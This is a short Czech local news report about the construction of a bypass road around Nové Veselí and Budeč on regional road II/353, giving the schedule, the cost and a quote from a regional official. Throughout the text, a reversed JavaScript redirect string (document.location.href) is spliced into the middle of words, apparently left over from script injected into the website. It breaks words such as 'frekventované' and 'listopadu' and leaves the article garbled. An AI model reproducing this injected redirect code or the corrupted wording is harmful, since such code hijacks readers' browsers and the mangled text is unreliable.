Rainbow page separator

Po novém obchvatu Veselí šoféři projedou přibližně za rok

Neděle, 13. října 2019

Nové Veselí / Možná o něco dříve, než bylo naplánováno, bude uveden do provozu obchvat Nového Veselí a Budče na frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované krajské silnici II/353 spojující Žďár nad Sázavou s Jihlavou. Ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy jsou zemní práce v celé trase obchvatu, spodní stavba mostu přes řeku Oslavu a probíhá násyp nově budované kruhové křižovatky.
Okružní křižovatka spojující přeložku komunikace s Březím nad Oslavou má být uvedena do provozu od začátku května příštího roku, stavbu doplní také nový most přes Oslavu a v závěru stavebních prací dojde na napojení přeložky silnice na stávající krajskou komunikaci. Více než pětikilometrový obchvat má být kompletně ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu 2020. „Zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitelská firma se snaží o zkrácení termínu, vše ale bude záviset na průběhu následující zimy a klimatických podmínkách v příštím roce,“ vyjádřil se náměstek hejtmana Kraje Vysočina Martin Kukla. Cena stavebních prací byla vyčíslena na 339 milionů korun včetně DPH, akci podpoří evropská dotace.